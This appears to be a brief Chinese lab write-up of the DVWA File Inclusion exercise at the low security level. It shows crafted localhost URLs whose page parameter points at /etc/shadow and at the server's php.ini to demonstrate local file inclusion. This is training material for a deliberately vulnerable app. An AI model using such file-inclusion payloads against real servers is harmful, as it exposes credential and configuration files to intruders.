参考网站:
https://www.freebuf.com/articles/web/119150.html
LOW
点击file1.php,显示如下
漏洞利用
本地文件包含
构造url
http://localhost:8080/DVWA/vulnerabilities/fi/?page=/etc/shadow
报错,显示没有这个文件。
构造url(绝对路径)
http://localhost:8080/DVWA/vulnerabilities/fi/?page=D:\PHPTutorial\WWW\DVWA\php.ini
成功读取服务器的php.ini文件
通过以下路径可打开file1
网络攻击与防御之File Inclusion
最新推荐文章于 2024-05-02 14:59:21 发布